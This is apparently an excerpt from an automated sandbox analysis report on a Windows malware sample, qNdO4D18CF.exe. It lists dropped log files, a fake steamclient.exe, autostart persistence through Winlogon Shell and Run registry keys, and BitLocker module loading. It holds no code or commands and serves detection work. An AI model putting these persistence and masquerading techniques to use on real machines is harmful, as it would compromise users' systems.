                    Source: C:\Program Files (x86)\Steam\steamclient.exeFile created: C:\Users\user\Desktop\Gumzpbgc.logJump to dropped file
                    Source: C:\Program Files (x86)\Steam\steamclient.exeFile created: C:\Users\user\Desktop\mXotVngM.logJump to dropped file
                    Source: C:\Program Files (x86)\Steam\steamclient.exeFile created: C:\Users\user\Desktop\jEEdizHN.logJump to dropped file
                    Source: C:\Program Files (x86)\Steam\steamclient.exeFile created: C:\Users\user\Desktop\lHqLDiMI.logJump to dropped file
                    Source: C:\Program Files (x86)\Steam\steamclient.exeFile created: C:\Users\user\Desktop\UAZgkvhu.logJump to dropped file
                    Source: C:\Program Files (x86)\Steam\steamclient.exeFile created: C:\Users\user\Desktop\KRGQASbM.logJump to dropped file
                    Source: C:\Program Files (x86)\Steam\steamclient.exeFile created: C:\Users\user\Desktop\zdbaQHhe.logJump to dropped file
                    Source: C:\Program Files (x86)\Steam\steamclient.exeFile created: C:\Users\user\Desktop\rzTkgNRx.logJump to dropped file
                    Source: C:\Program Files (x86)\Steam\steamclient.exeFile created: C:\Users\user\Desktop\asCFMbmi.logJump to dropped file
                    Source: C:\Program Files (x86)\Steam\steamclient.exeFile created: C:\Users\user\Desktop\PEYPdPrA.logJump to dropped file
                    Source: C:\Program Files (x86)\Steam\steamclient.exeFile created: C:\Users\user\Desktop\yxHkJcLm.logJump to dropped file
                    Source: C:\Program Files (x86)\Steam\steamclient.exeFile created: C:\Users\user\Desktop\oOnUZAGE.logJump to dropped file
                    Source: C:\Program Files (x86)\Steam\steamclient.exeFile created: C:\Users\user\Desktop\ffUEpXBW.logJump to dropped file
                    Source: C:\Program Files (x86)\Steam\steamclient.exeFile created: C:\Users\user\Desktop\VxBoFvwp.logJump to dropped file
                    Source: C:\Program Files (x86)\Steam\steamclient.exeFile created: C:\Users\user\Desktop\KJWyVjBG.logJump to dropped file
                    Source: C:\Program Files (x86)\Steam\steamclient.exeFile created: C:\Users\user\Desktop\IYriOWqO.logJump to dropped file
                    Source: C:\Program Files (x86)\Steam\steamclient.exeFile created: C:\Users\user\Desktop\rRaDvjLz.logJump to dropped file
                    Source: C:\Program Files (x86)\Steam\steamclient.exeFile created: C:\Users\user\Desktop\WucwbvLj.logJump to dropped file
                    Source: C:\Program Files (x86)\Steam\steamclient.exeFile created: C:\Users\user\Desktop\EhArHZqU.logJump to dropped file
                    Source: C:\Program Files (x86)\Steam\steamclient.exeFile created: C:\Users\user\Desktop\lQNLnUfF.logJump to dropped file
                    Source: C:\Program Files (x86)\Steam\steamclient.exeFile created: C:\Users\user\Desktop\bhuvEsaX.logJump to dropped file
                    Source: C:\Program Files (x86)\Steam\steamclient.exeFile created: C:\Users\user\Desktop\LforkokJ.logJump to dropped file
                    Source: C:\Program Files (x86)\Steam\steamclient.exeFile created: C:\Users\user\Desktop\BwVbAMfc.logJump to dropped file
                    Source: C:\Program Files (x86)\Steam\steamclient.exeFile created: C:\Users\user\Desktop\sOBLQjau.logJump to dropped file
                    Source: C:\Program Files (x86)\Steam\steamclient.exeFile created: C:\Users\user\Desktop\YwOfwePf.logJump to dropped file
                    Source: C:\Users\user\Desktop\qNdO4D18CF.exeFile created: C:\Users\user\Desktop\fIcWIVzb.logJump to dropped file
                    Source: C:\Users\user\Desktop\qNdO4D18CF.exeFile created: C:\Users\user\Desktop\gFDeeVNW.logJump to dropped file
                    Source: C:\Users\user\Desktop\qNdO4D18CF.exeFile created: C:\Users\user\Desktop\XXkOusIo.logJump to dropped file
                    Source: C:\Users\user\Desktop\qNdO4D18CF.exeFile created: C:\Users\user\Desktop\NoRyKQDH.logJump to dropped file
                    Source: C:\Users\user\Desktop\qNdO4D18CF.exeFile created: C:\Users\user\Desktop\EFxianyZ.logJump to dropped file
                    Source: C:\Users\user\Desktop\qNdO4D18CF.exeFile created: C:\Users\user\Desktop\nDreGkIL.logJump to dropped file
                    Source: C:\Users\user\Desktop\qNdO4D18CF.exeFile created: C:\Users\user\Desktop\JxaHDTDN.logJump to dropped file
                    Source: C:\Users\user\Desktop\qNdO4D18CF.exeFile created: C:\Users\user\Desktop\QvOHgixC.logJump to dropped file
                    Source: C:\Users\user\Desktop\qNdO4D18CF.exeFile created: C:\Users\user\Desktop\mHEDqnlH.logJump to dropped file
                    Source: C:\Users\user\Desktop\qNdO4D18CF.exeFile created: C:\Users\user\Desktop\KMIinpLK.logJump to dropped file
                    Source: C:\Users\user\Desktop\qNdO4D18CF.exeFile created: C:\Users\user\Desktop\BdpSDMGd.logJump to dropped file
                    Source: C:\Users\user\Desktop\qNdO4D18CF.exeFile created: C:\Users\user\Desktop\kWYnjZbO.logJump to dropped file
                    Source: C:\Users\user\Desktop\qNdO4D18CF.exeFile created: C:\Users\user\Desktop\RKwhQDGz.logJump to dropped file
                    Source: C:\Users\user\Desktop\qNdO4D18CF.exeFile created: C:\Users\user\Desktop\HWSrgsLR.logJump to dropped file
                    Source: C:\Users\user\Desktop\qNdO4D18CF.exeFile created: C:\Users\user\Desktop\qOBMMFgD.logJump to dropped file
                    Source: C:\Users\user\Desktop\qNdO4D18CF.exeFile created: C:\Users\user\Desktop\ggiwcdaV.logJump to dropped file
                    Source: C:\Users\user\Desktop\qNdO4D18CF.exeFile created: C:\Users\user\Desktop\VsDGsRfn.logJump to dropped file
                    Source: C:\Users\user\Desktop\qNdO4D18CF.exeFile created: C:\Users\user\Desktop\DfbAZvLY.logJump to dropped file
                    Source: C:\Users\user\Desktop\qNdO4D18CF.exeFile created: C:\Users\user\Desktop\mYLVFIfJ.logJump to dropped file
                    Source: C:\Users\user\Desktop\qNdO4D18CF.exeFile created: C:\Users\user\Desktop\THYplDVu.logJump to dropped file
                    Source: C:\Users\user\Desktop\qNdO4D18CF.exeFile created: C:\Users\user\Desktop\ITtzBsaM.logJump to dropped file
                    Source: C:\Users\user\Desktop\qNdO4D18CF.exeFile created: C:\Users\user\Desktop\zplKRyKf.logJump to dropped file
                    Source: C:\Users\user\Desktop\qNdO4D18CF.exeFile created: C:\Users\user\Desktop\iiUfyMfQ.logJump to dropped file
                    Source: C:\Users\user\Desktop\qNdO4D18CF.exeFile created: C:\Users\user\Desktop\VrbgQkMX.logJump to dropped file
                    Source: C:\Users\user\Desktop\qNdO4D18CF.exeFile created: C:\Users\user\Desktop\cpPftzHM.logJump to dropped file
                    Source: C:\Users\user\Desktop\qNdO4D18CF.exeFile created: C:\Users\user\Desktop\BzfkqkWQ.logJump to dropped file
                    Source: C:\Users\user\Desktop\qNdO4D18CF.exeFile created: C:\Users\user\Desktop\rLAuGYci.logJump to dropped file
                    Source: C:\Users\user\Desktop\qNdO4D18CF.exeFile created: C:\Users\user\Desktop\hcheWwWA.logJump to dropped file
                    Source: C:\Users\user\Desktop\qNdO4D18CF.exeFile created: C:\Users\user\Desktop\PPFZCaBl.logJump to dropped file
                    Source: C:\Users\user\Desktop\qNdO4D18CF.exeFile created: C:\Users\user\Desktop\MeZIvNrs.logJump to dropped file
                    Source: C:\Users\user\Desktop\qNdO4D18CF.exeFile created: C:\Users\user\Desktop\CqvSLBwK.logJump to dropped file
                    Source: C:\Users\user\Desktop\qNdO4D18CF.exeFile created: C:\Users\user\Desktop\sIbCbYqd.logJump to dropped file
                    Source: C:\Users\user\Desktop\qNdO4D18CF.exeFile created: C:\Users\user\Desktop\GeNRoyLy.logJump to dropped file
                    Source: C:\Users\user\Desktop\qNdO4D18CF.exeFile created: C:\Users\user\Desktop\qcHMUuVk.logJump to dropped file
                    Source: C:\Users\user\Desktop\qNdO4D18CF.exeFile created: C:\Users\user\Desktop\htowkSQD.logJump to dropped file
                    Source: C:\Users\user\Desktop\qNdO4D18CF.exeFile created: C:\Users\user\Desktop\cRJFZrfS.logJump to dropped file
                    Source: C:\Users\user\Desktop\qNdO4D18CF.exeFile created: C:\Users\user\Desktop\MHUibFPy.logJump to dropped file
                    Source: C:\Users\user\Desktop\qNdO4D18CF.exeFile created: C:\Users\user\Desktop\CYASrcKR.logJump to dropped file
                    Source: C:\Users\user\Desktop\qNdO4D18CF.exeFile created: C:\Users\user\Desktop\sphCHAEj.logJump to dropped file
                    Source: C:\Users\user\Desktop\qNdO4D18CF.exeFile created: C:\Users\user\Desktop\SzxHEkUn.logJump to dropped file
                    Source: C:\Users\user\Desktop\qNdO4D18CF.exeFile created: C:\Users\user\Desktop\HLSRUZZF.logJump to dropped file
                    Source: C:\Users\user\Desktop\qNdO4D18CF.exeFile created: C:\Users\user\Desktop\qEBmAmuq.logJump to dropped file
                    Source: C:\Users\user\Desktop\qNdO4D18CF.exeFile created: C:\Users\user\Desktop\fQXwQazI.logJump to dropped file
                    Source: C:\Users\user\Desktop\qNdO4D18CF.exeFile created: C:\Users\user\Desktop\TxYPZkji.logJump to dropped file
                    Source: C:\Users\user\Desktop\qNdO4D18CF.exeFile created: C:\Users\user\Desktop\PGiZSoip.logJump to dropped file
                    Source: C:\Users\user\Desktop\qNdO4D18CF.exeFile created: C:\Users\user\Desktop\IaBrEuiC.logJump to dropped file

                    Boot Survival

                    barindex
                    Creates an undocumented autostart registry key
                    Source: C:\Users\user\Desktop\qNdO4D18CF.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon ShellJump to behavior
                    Source: C:\Users\user\Desktop\qNdO4D18CF.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon ShellJump to behavior
                    Creates multiple autostart registry keys
                    Source: C:\Users\user\Desktop\qNdO4D18CF.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run steamclientJump to behavior
                    Source: C:\Users\user\Desktop\qNdO4D18CF.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run qNdO4D18CFJump to behavior
                    Source: C:\Users\user\Desktop\qNdO4D18CF.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run steamclientJump to behavior
                    Source: C:\Users\user\Desktop\qNdO4D18CF.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run steamclientJump to behavior
                    Source: C:\Users\user\Desktop\qNdO4D18CF.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run qNdO4D18CFJump to behavior
                    Source: C:\Users\user\Desktop\qNdO4D18CF.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run qNdO4D18CFJump to behavior

                    Hooking and other Techniques for Hiding and Protection

                    barindex
                    Loading BitLocker PowerShell Module
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                    Source: C:\Users\user\Desktop\qNdO4D18CF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\qNdO4D18CF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\qNdO4D18CF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\qNdO4D18CF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\qNdO4D18CF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\qNdO4D18CF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\qNdO4D18CF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\qNdO4D18CF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\qNdO4D18CF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\qNdO4D18CF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\qNdO4D18CF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\qNdO4D18CF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\qNdO4D18CF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\qNdO4D18CF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\qNdO4D18CF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
